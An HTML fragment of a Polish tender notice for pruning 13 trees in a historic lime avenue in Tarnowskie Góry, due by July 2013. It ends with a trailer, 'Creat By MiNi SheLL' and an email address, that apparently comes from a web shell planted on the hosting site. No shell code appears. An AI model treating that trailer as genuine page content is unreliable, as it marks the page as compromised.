<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca wykonanie zabiegów pielęgnacyjno-konserwacyjnych starodrzewu zabytkowej alei lipowej przy ul. Lipowej w Tarnowskich Górach polegających na wykonaniu cięć sanitarnych i formujących 13 sztuk drzew wchodzących w skład starodrzewu alei lipowej zgodnie z załączonym przedmiarem robót i opisem przedmiotu zamówienia.
Szczegółowy opis przedmiotu zamówienia znajduje sięw załączniku nr 1 Opis przedmiotu zamówienia i stanowi integralną część siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com